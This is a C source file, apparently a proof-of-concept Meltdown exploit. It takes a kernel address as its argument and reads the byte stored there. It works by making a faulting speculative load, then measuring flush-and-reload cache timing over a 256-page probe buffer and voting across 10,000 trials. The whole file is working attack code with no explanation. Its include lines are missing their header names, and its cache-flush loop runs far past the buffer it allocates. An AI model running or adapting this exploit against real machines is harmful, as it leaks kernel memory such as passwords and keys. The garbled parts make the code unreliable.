#include #include #include #include #include #include #include #include #include const unsigned cacheline_size = 64; const unsigned pgsz = 4096; const unsigned ntrials = 10000; jmp_buf reset; uint64_t kaddr; uint8_t *kptr; uint8_t kbyte; void *ubuf; uint8_t *uptr; unsigned vote[256]; static inline uint64_t rdtsc(void) { uint32_t lo, hi, tag; asm volatile("rdtscp" : "=a"(lo), "=d"(hi), "=c"(tag)); return ((uint64_t)hi << 32) | lo; } static inline void clflush(const void *ptr) { asm volatile("clflush (%0)" : : "r"(ptr)); } static inline uint8_t core(const uint8_t *k, const uint8_t *u) { uint8_t v; asm volatile( "0:\n" " mov (%%rcx),%%al;\n" " shl $0xc,%%rax;\n" " jz 0b;\n" " mov (%%rbx,%%rax,1),%%rbx" : "=b"(v) : "c"(k), "b"(u) : "ax"); return v; } static void sigsegv(int signo) { uint64_t t[256 + 1], tmin; unsigned i, imin; volatile uint8_t ubyte; (void)signo; t[0] = rdtsc(); for (i = 0; i < 256; i++) { ubyte = uptr[pgsz*i]; t[i + 1] = rdtsc(); } imin = 0; tmin = t[1] - t[0]; for (i = 1; i < 256; i++) { if (t[i + 1] - t[i] < tmin) { imin = i; tmin = t[i + 1] - t[i]; } } vote[imin]++; longjmp(reset, 1); } int main(int argc, char **argv) { char *end; int error; unsigned trial; volatile uint8_t ubyte; unsigned i, ibest, vbest; setprogname(argv[0]); if (argc != 2) errx(1, "usage: %s \n", getprogname()); errno = 0; kaddr = strtoumax(argv[1], &end, 0); if (end == argv[1] || end[0] != '\0' || errno) errx(1, "invalid address"); kaddr &= ~(uint64_t)0x7; kptr = (void *)(uintptr_t)kaddr; fprintf(stderr, "kptr %p\n", kptr); error = posix_memalign(&ubuf, 4096, 256*pgsz); if (error) { errno = error; err(1, "posix_memalign"); } arc4random_buf(ubuf, 256*pgsz); uptr = ubuf; fprintf(stderr, "uptr %p\n", uptr); if (signal(SIGSEGV, &sigsegv) == SIG_ERR) err(1, "signal"); register uint8_t *uptr0 = uptr; register uint8_t *kptr0 = kptr; for (trial = 0; trial < ntrials; trial++) { if (setjmp(reset) == 0) { for (i = 0; i < 256*pgsz*cacheline_size; i++) clflush(&uptr0[i*cacheline_size]); ubyte = core(kptr0, uptr0); } } if (signal(SIGSEGV, SIG_DFL) == SIG_ERR) err(1, "signal"); ibest = 0; vbest = vote[0]; for (i = 0; i < 256; i++) { fprintf(stderr, "vote[%02x] = %u\n", i, vote[i]); if (vote[i] > vbest) { ibest = i; vbest = vote[i]; } } if (printf("%02"PRIx8"\n", ibest) < 0) err(1, "printf"); return 0; }